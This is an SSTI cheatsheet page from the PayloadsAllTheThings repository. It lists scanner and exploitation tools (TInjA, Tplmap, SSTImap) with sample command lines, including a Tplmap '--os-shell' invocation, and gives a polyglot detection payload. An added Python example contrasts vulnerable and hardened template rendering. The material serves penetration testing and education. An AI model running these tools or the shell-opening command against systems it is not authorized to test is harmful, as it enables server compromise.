PayloadsAllTheThings/Server Side Template Injection/README.md
2024-10-23 13:59:18 +02:00


Server Side Template Injection

Template injection allows an attacker to include template code in an existing template (or to supply a new one). A template engine makes designing HTML pages easier by using static template files whose variables/placeholders are replaced with actual values at runtime when the HTML page is rendered.

Summary

Tools

  • TInjA - An efficient SSTI + CSTI scanner that uses novel polyglots

    tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
    tinja url -u "http://example.com/" -d "username=Kirlia"  -c "PHPSESSID=ABC123..."
    
  • Tplmap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool

    python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
    python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
    python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
    
  • SSTImap - Automatic SSTI detection tool with interactive interface based on Tplmap

    python3 ./sstimap.py -u 'https://example.com/page?name=John' -s
    python3 ./sstimap.py -u 'https://example.com/page?name=Vulnerable*&message=My_message' -l 5 -e jade
    python3 ./sstimap.py -i -A -m POST -l 5 -H 'Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk'
    

Methodology

SSTI cheatsheet workflow

Detection

In most cases, this polyglot payload will trigger an error in the presence of an SSTI vulnerability:

${{<%[%'"}}%\.

The Template Injection Table is an interactive table containing the most efficient template injection polyglots along with the expected responses of the 44 most important template engines.
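As an added illustration (not part of the original cheatsheet), the check below uses Python's standard-library string.Template as a stand-in for a real engine: the vulnerable renderer splices user input into the template source, so the polyglot above makes the parser raise a template error, while the hardened renderer passes the same input as a variable and echoes it verbatim. The function names and the "Hello" template are assumptions made for the example.

```python
"""Vulnerable vs. hardened template rendering, shown with the stdlib
string.Template engine as a stand-in for Jinja2, Twig, Freemarker, etc."""
from string import Template

# The detection polyglot from the cheatsheet. It mixes the delimiters of
# many engines so that at least one of them chokes when the payload is
# parsed as template *source* rather than treated as plain data.
POLYGLOT = "${{<%[%'\"}}%\\."


def render_vulnerable(user_input: str) -> str:
    """Anti-pattern: user input is concatenated INTO the template source,
    so the engine parses attacker-controlled text as template syntax."""
    return Template("Hello " + user_input + "!").substitute()


def render_hardened(user_input: str) -> str:
    """Fix: the template is a constant; user input is supplied as a
    variable and is therefore only ever treated as data."""
    return Template("Hello $name!").substitute(name=user_input)


def ssti_error_signal(render, user_input: str = POLYGLOT) -> bool:
    """Detection check: does rendering the polyglot raise a template
    error? For string.Template a malformed placeholder raises ValueError
    and an unknown placeholder raises KeyError; either means the input
    reached the template parser, which is the SSTI signal."""
    try:
        render(user_input)
    except (ValueError, KeyError):
        return True
    return False


if __name__ == "__main__":
    print(render_hardened("Kirlia"))                      # Hello Kirlia!
    print("vulnerable:", ssti_error_signal(render_vulnerable))  # True
    print("hardened:", ssti_error_signal(render_hardened))      # False
    print(render_hardened(POLYGLOT))                      # polyglot echoed as data
```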

References